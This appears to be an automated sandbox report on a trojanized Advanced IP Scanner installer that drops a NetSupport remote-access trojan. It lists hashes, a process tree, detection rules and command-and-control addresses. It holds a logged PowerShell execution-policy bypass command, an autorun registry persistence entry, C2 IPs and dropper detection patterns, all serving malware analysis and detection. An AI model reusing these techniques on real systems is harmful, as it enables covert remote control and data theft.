Edit tour

Windows Analysis Report
Advanced_IP_Scanner_2.5.4594.12.exe

Overview

General Information

Sample name:	Advanced_IP_Scanner_2.5.4594.12.exe
Analysis ID:	1546304
MD5:	446c29d515104b6752c1e9da981d4e5e
SHA1:	d52760df6b22805a4470a6b2e72654ce36577f30
SHA256:	7b13496fb45b51e821771d63bbd1d503f07710f676481ff34962b051283d8033
Tags:	exeuser-NDA0E
Infos:

Detection

NetSupport RAT, NetSupport Downloader

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell drops NetSupport RAT client

Suricata IDS alerts for network traffic

Yara detected Advanced IP Scanner Hacktool

Yara detected NetSupport Downloader

Bypasses PowerShell execution policy

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Yara signature match

Classification

Process Tree

System is w10x64

Advanced_IP_Scanner_2.5.4594.12.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" MD5: 446C29D515104B6752C1E9DA981D4E5E)

Advanced_IP_Scanner_2.5.4594.12.tmp (PID: 7512 cmdline: "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" MD5: 597637EDBEBB79D482E762E238209BCD)

powershell.exe (PID: 7872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

client32.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

client32.exe (PID: 8168 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

client32.exe (PID: 4564 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
C:\Program Files (x86)\Advanced IP Scanner\is-91UK3.tmp	JoeSecurity_AdvancedIPScannerHacktool	Yara detected Advanced IP Scanner Hacktool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Program Files (x86)\Advanced IP Scanner\unins000.dat	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000000.1985766789.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.4190638856.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000000.2081672435.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000000.2163165064.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.2038454722.00000000076DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.2042967524.000000000878D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2083140759.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2164182999.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: powershell.exe PID: 7872	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: powershell.exe PID: 7872	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x65615f:$b1: ::WriteAllBytes( 0x65612a:$b2: ::FromBase64String( 0xdd163:$s1: -join 0xe948a:$s1: -join 0x23cafb:$s1: -join 0x249bd0:$s1: -join 0x24cfa2:$s1: -join 0x24d654:$s1: -join 0x24f145:$s1: -join 0x25134b:$s1: -join 0x251b72:$s1: -join 0x2523e2:$s1: -join 0x252b1d:$s1: -join 0x252b4f:$s1: -join 0x252b97:$s1: -join 0x252bb6:$s1: -join 0x253406:$s1: -join 0x253582:$s1: -join 0x2535fa:$s1: -join 0x25368d:$s1: -join 0x2538f3:$s1: -join
Process Memory Space: client32.exe PID: 8036	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 8036	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 8168	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 8168	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 4564	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 4564	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.client32.exe.688b0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.688b0000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.688b0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.68890000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.68890000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.68890000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.68590000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 20 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7872.amsi.csv	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
amsi32_7872.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2e4f78:$b1: ::WriteAllBytes( 0x2e4f42:$b2: ::FromBase64String( 0x2f16a4:$s1: -join 0x2eae50:$s4: += 0x2eaf12:$s4: += 0x2ef139:$s4: += 0x2f1256:$s4: += 0x2f1540:$s4: += 0x2f1686:$s4: += 0x2f4e9c:$s4: += 0x2f4fa0:$s4: += 0x2f83fc:$s4: += 0x2f8adc:$s4: += 0x2f8f92:$s4: += 0x2f8fe7:$s4: += 0x2f925b:$s4: += 0x2f928a:$s4: += 0x2f97d2:$s4: += 0x2f9801:$s4: += 0x2f98e0:$s4: += 0x2fbb77:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7512, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7512, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7512, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", ProcessId: 7872, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetFilename: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$20466,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7512, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1", ProcessId: 7872, ProcessName: powershell.exe

Remote Access Functionality

Sigma detected: Powershell drops NetSupport RAT client

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetFilename: C:\Users\user\AppData\Roaming\SysHelper\NSM.LIC

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T18:48:28.742313+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.4	49739	TCP
2024-10-31T18:49:07.603436+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.4	49760	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T18:48:11.290472+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.4	49741	199.188.200.195	443	TCP
2024-10-31T18:48:11.290472+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.4	49740	151.236.16.15	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		7_2_110AC820
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		8_2_110AC820

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\client32.exe			Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\client32.exe			Jump to behavior

Uses 32bit PE files

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: certificate valid

Uses new MSVCR Dlls

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.4194115639.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2084821391.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2165673550.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: ws\Mion.pdb source: powershell.exe, 00000005.00000002.2038454722.00000000076C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb00 source: is-JTIOC.tmp.1.dr
Source:	Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: is-2I7SK.tmp.1.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: is-7V6MF.tmp.1.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: is-DFL4O.tmp.1.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: is-56ICT.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: is-8VUCH.tmp.1.dr
Source:	Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: is-853KO.tmp.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: is-JPUOQ.tmp.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: is-SF594.tmp.1.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4193839189.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2084472036.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2165360601.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: is-GHBG6.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: System.Management.Automation.pdbrq source: powershell.exe, 00000005.00000002.2038454722.00000000076DB000.00000004.00000020.00020000.00000000.sdmp
